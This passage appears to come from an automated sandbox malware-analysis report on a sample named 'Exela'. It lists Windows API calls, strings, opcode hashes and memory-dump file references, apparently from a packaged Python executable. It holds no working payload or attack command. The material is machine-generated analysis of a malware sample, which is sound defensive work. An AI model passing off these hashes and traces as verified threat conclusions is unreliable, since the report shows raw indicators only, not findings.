                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6E3A6E46A,?,?,?,00007FF6E3A6D39C,?,?,?,00007FF6E3A6CF91), ref: 00007FF6E3A6E23D
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6E3A6E46A,?,?,?,00007FF6E3A6D39C,?,?,?,00007FF6E3A6CF91), ref: 00007FF6E3A6E24B
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6E3A6E46A,?,?,?,00007FF6E3A6D39C,?,?,?,00007FF6E3A6CF91), ref: 00007FF6E3A6E275
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6E3A6E46A,?,?,?,00007FF6E3A6D39C,?,?,?,00007FF6E3A6CF91), ref: 00007FF6E3A6E2E3
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6E3A6E46A,?,?,?,00007FF6E3A6D39C,?,?,?,00007FF6E3A6CF91), ref: 00007FF6E3A6E2EF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                            • Opcode ID: 257efbe4257383a3eec37a8e0b20558c4c24ba0fcd14ee08d032d02959c7be2e
                                                                                                                                                                                                                                                            • Instruction ID: b8d6c2cc6cc1df17d079a681fcfff3370438a4ebbfb5d2e7e44dcc960d1e7967
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 257efbe4257383a3eec37a8e0b20558c4c24ba0fcd14ee08d032d02959c7be2e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6331F623B2A64280EE15DB5EE502B753BD5BF84BA0F090531DD1EA7780DE3DE4C48309
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E3A62A9B), ref: 00007FF6E3A68C0A
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A629C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E3A688E2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A6101D), ref: 00007FF6E3A629F4
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A629C0: MessageBoxW.USER32 ref: 00007FF6E3A62AD0
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E3A62A9B), ref: 00007FF6E3A68C90
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                                                            • API String ID: 3723044601-876015163
                                                                                                                                                                                                                                                            • Opcode ID: 83b31a2985e644c59f7e42e272613087ded70715f2d4689f177d6a205493e17b
                                                                                                                                                                                                                                                            • Instruction ID: 88b500c7893b798163020b0979bcd4b06cf8812b6687daf1d6aafeb2962ed2a4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83b31a2985e644c59f7e42e272613087ded70715f2d4689f177d6a205493e17b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F21B923B18A8281EB10CB1DF445265ABA1FFC57C4F584531DB4CE3769EF2ED5818705
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                                            • Opcode ID: ef37840ed9934c1aaeb06cf917a3ae799d9876d4d923df49702be147c9d5e414
                                                                                                                                                                                                                                                            • Instruction ID: 08696cb200f6f968e296b7187f5548d7fbdc161b0b1e4b6c0cdcf4eaf92fd840
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef37840ed9934c1aaeb06cf917a3ae799d9876d4d923df49702be147c9d5e414
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C21B362B0C24246FA646729D5973795A924F447B0F104734D93DF76DFDE2EA4C1830A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                            • Opcode ID: c684c657c71cc66e393495913d92b804321d58ad0ed46cdbde63fde403b390ba
                                                                                                                                                                                                                                                            • Instruction ID: a96c077d98128101159d141d18de8a328ec79bffc23f86b06fc3744a6517b13d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c684c657c71cc66e393495913d92b804321d58ad0ed46cdbde63fde403b390ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD118422718A8286E7508B5AF849329BBA4FB88FE4F044234D91DE7794DF3ED5848749
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6E3A75AAD,?,?,?,?,00007FF6E3A7F79F,?,?,00000000,00007FF6E3A7BF86,?,?,?), ref: 00007FF6E3A7BE77
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6E3A75AAD,?,?,?,?,00007FF6E3A7F79F,?,?,00000000,00007FF6E3A7BF86,?,?,?), ref: 00007FF6E3A7BEAD
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6E3A75AAD,?,?,?,?,00007FF6E3A7F79F,?,?,00000000,00007FF6E3A7BF86,?,?,?), ref: 00007FF6E3A7BEDA
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6E3A75AAD,?,?,?,?,00007FF6E3A7F79F,?,?,00000000,00007FF6E3A7BF86,?,?,?), ref: 00007FF6E3A7BEEB
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6E3A75AAD,?,?,?,?,00007FF6E3A7F79F,?,?,00000000,00007FF6E3A7BF86,?,?,?), ref: 00007FF6E3A7BEFC
                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6E3A75AAD,?,?,?,?,00007FF6E3A7F79F,?,?,00000000,00007FF6E3A7BF86,?,?,?), ref: 00007FF6E3A7BF17
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                                            • Opcode ID: ddf8d81a22343009781cfd87416a9e8d85b9fb6f44d6b4a7416555ba1d33dd0c
                                                                                                                                                                                                                                                            • Instruction ID: 2b51e0f90cf9ae944cb6fcab6f2f423a9693085b75c038c740e54d0e2ca60770
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddf8d81a22343009781cfd87416a9e8d85b9fb6f44d6b4a7416555ba1d33dd0c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A611A462B0D24242F658572DD5D73395A914F847B0F104734E92EF67DADE2EE4C1870A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                            • Opcode ID: 1f3d1521894b1493867d551a7722980cdb1a6c55e5d92a75b7aa063c884505e7
                                                                                                                                                                                                                                                            • Instruction ID: fbde15b1d49aceafd418210be8eee6b8aac08693e61133e8d4b770a9d99c9ac6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f3d1521894b1493867d551a7722980cdb1a6c55e5d92a75b7aa063c884505e7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73315133718A8285EB20EF29E8562F97761FF88784F400135EA4D97A99DF3ED185C705
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E3A688E2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A6101D), ref: 00007FF6E3A629F4
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68560: GetLastError.KERNEL32(00000000,00007FF6E3A62A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A6101D), ref: 00007FF6E3A68587
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68560: FormatMessageW.KERNEL32 ref: 00007FF6E3A685B6
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6E3A68BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E3A62A9B), ref: 00007FF6E3A68C0A
                                                                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF6E3A62AD0
                                                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF6E3A62AEC
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                                                                                                                            • Opcode ID: a22562a3e5708768cb0d15f904b55a8b62d2097d7bb286fe6f48fe5cd4d63a9f
                                                                                                                                                                                                                                                            • Instruction ID: 1e0b2013a3a8e38d4aac186c3031369959380a8617ac776b1ef22cbcfa0fd859
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a22562a3e5708768cb0d15f904b55a8b62d2097d7bb286fe6f48fe5cd4d63a9f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1331A473728AC181E630DB18F4527EAB764FF84B84F404036E68DA2A99DF3DD285CB45
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                            • Opcode ID: 8b09857164704210b2e0253d11d0b3fe713c31e540e9fb1e205907d45fa6ef0f
                                                                                                                                                                                                                                                            • Instruction ID: 78978e1d9ddabc3906b6c976ac86fc406f9d4b1e52d2a182fd04012ce0a0d300
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b09857164704210b2e0253d11d0b3fe713c31e540e9fb1e205907d45fa6ef0f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AF0FC63B09B4241FB108F2CE49A3359B30EF44760F440235D56E966E4CF2ED0C4C709
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                                                            • Instruction ID: 8ea9dc302625d6226236e20e0d510e79bb2df9d8580ac4a2af24af2d64bf0346
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40116323F1CE8305F778195DD44F37529406F54360E150635E66EA62E6EE2FB8E1424B
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6E3A7B147,?,?,00000000,00007FF6E3A7B3E2,?,?,?,?,?,00007FF6E3A736AC), ref: 00007FF6E3A7BF4F
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6E3A7B147,?,?,00000000,00007FF6E3A7B3E2,?,?,?,?,?,00007FF6E3A736AC), ref: 00007FF6E3A7BF6E
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6E3A7B147,?,?,00000000,00007FF6E3A7B3E2,?,?,?,?,?,00007FF6E3A736AC), ref: 00007FF6E3A7BF96
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6E3A7B147,?,?,00000000,00007FF6E3A7B3E2,?,?,?,?,?,00007FF6E3A736AC), ref: 00007FF6E3A7BFA7
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6E3A7B147,?,?,00000000,00007FF6E3A7B3E2,?,?,?,?,?,00007FF6E3A736AC), ref: 00007FF6E3A7BFB8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                            • Opcode ID: 5469ad97ef1dc323ed31f4bb816bde73ef5dcee44b4409764bd7785a0893e436
                                                                                                                                                                                                                                                            • Instruction ID: 5852da3cf4051964a9c51f912dd15012c5dcf6e0ddd86acfc6518c6fedbf6472
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5469ad97ef1dc323ed31f4bb816bde73ef5dcee44b4409764bd7785a0893e436
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 601190A2B0D20201FA58676DE5E73391A815F807A0F144234E82DF66DEDE2EE582870A
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                            • Opcode ID: 8f64e276412905fb556d0cf6e5ae689124ad209186916bebc7020e596f8a9cd9
                                                                                                                                                                                                                                                            • Instruction ID: 1046b0aacbd204edbaa133d3ca5c151f62dd2860d835a5c85bde73305feb32bd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f64e276412905fb556d0cf6e5ae689124ad209186916bebc7020e596f8a9cd9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B111CA2B0D20745FA68662D94E73791A824F85374E244734DA3DFA2DBDD2EB5C1830F
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000051.00000002.1852720107.00007FF6E3A61000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852677009.00007FF6E3A60000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852775455.00007FF6E3A8C000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3A9F000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852834253.00007FF6E3AA1000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000051.00000002.1852923013.00007FF6E3AA3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_81_2_7ff6e3a60000_Exela.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
